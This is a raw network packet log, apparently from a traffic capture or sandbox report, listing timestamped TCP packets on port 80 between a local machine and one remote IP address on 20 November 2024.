                                                                                                                                                                                                Nov 20, 2024 10:54:34.780630112 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.780644894 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.780661106 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.780690908 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.780807018 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.780822992 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.780838966 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.780853987 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.780862093 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.780900002 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.783041954 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.783055067 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.783068895 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.783085108 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.783098936 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.783109903 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.783117056 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.783129930 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.783170938 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.783207893 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.783225060 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.783240080 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.783256054 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.783256054 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.783272028 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.783288002 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.783296108 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.783309937 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.783333063 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.783350945 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.783366919 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.783382893 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.783385992 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.783400059 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.787743092 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.799532890 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.799549103 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.799565077 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.799578905 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.799593925 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.799596071 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.799612045 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.799629927 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.799638987 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.799653053 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.799654961 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.799669027 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.799669981 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.799685001 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.799705982 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.799710989 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.799731970 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.799747944 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.799748898 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.799767017 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.799809933 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.800754070 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.800769091 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.800785065 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.800806999 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.800811052 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.800827026 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.800838947 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.800843954 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.800859928 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.800873995 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.800884962 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.800904989 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.835278034 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.835292101 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.835305929 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.835330963 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.835331917 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.835346937 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.835359097 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.835364103 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.835381985 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.835395098 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.835401058 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.835428953 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.837615013 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.837640047 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.837663889 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.837663889 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.837678909 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.837687969 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.837702036 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.837719917 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.837733030 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.837738037 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.837774038 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.838373899 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.838387966 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.838435888 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.838458061 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.838474035 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.838491917 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.838500023 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.838510990 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.838526011 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.838529110 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.838542938 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.838584900 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.838754892 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.838768005 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.838783979 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.838794947 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.838824987 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.838826895 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.838841915 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.838881016 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.838908911 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.838932991 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.838948011 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.838963985 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.838979959 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.838988066 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.839000940 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.839031935 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.839047909 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.839062929 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.839087009 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.839109898 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.839297056 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.839319944 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.839335918 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.839375973 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.839492083 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.839507103 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.839521885 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.839536905 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.839538097 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.839554071 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.839559078 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.839570045 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.839592934 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.839593887 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.839637041 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.840887070 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.840902090 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.840917110 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.840939999 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.840950012 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.840955973 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.840970993 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.840982914 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.840987921 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.841020107 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.841032982 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.841075897 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.841085911 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.841103077 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.841119051 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.841145992 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.841227055 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.841247082 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.841255903 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.841264009 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.841280937 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.841317892 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.841443062 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.841466904 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.841483116 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.841505051 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.841516018 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.841526031 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.841542006 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.841557026 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.841559887 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.841573954 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.841590881 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.841713905 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.869260073 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.869338036 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.869354010 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.869369030 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.869383097 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.869395971 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.869399071 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.869415045 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.869440079 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.869440079 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.870245934 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.870261908 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.870276928 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.870299101 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.870312929 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.870352030 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.870367050 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.870382071 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.870398045 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.870412111 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.870420933 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.870431900 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.872536898 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.872551918 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.872591972 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.872597933 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.872613907 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.872637033 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.872638941 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.872658014 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.872672081 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.872704029 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.872728109 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.872728109 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.872731924 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.872747898 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.872764111 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.872771978 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.872781038 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.872797966 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.872803926 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.872823000 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.872838020 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.872842073 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.872855902 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.872893095 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.890515089 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.890542984 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.890556097 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.890578032 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.890582085 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.890593052 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.890594959 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.890621901 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.890645027 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.890650034 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.890661955 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.890686989 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.890687943 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.890706062 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.890719891 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.890732050 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.890737057 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.890764952 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.890769958 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.890808105 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.890820026 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.890836000 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.890851974 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.890877962 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.891866922 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.891886950 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.891901970 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.891916990 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.891927958 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.891932964 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.891948938 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.891949892 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.891964912 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.891980886 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.892018080 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.914561987 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.926415920 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.926467896 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.926507950 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.926518917 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.926533937 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.926574945 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.926574945 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.926592112 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.926608086 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.926655054 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.926661968 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.926704884 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.928670883 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.928699017 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.928714037 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.928756952 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.928786993 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.928802013 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.928818941 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.928833961 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.928885937 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.928885937 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.929516077 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.929531097 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.929563046 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.929568052 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.929579973 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.929595947 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.929603100 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.929611921 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.929630995 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.929647923 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.929651976 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.929666996 CET4981280192.168.2.7185.215.113.16
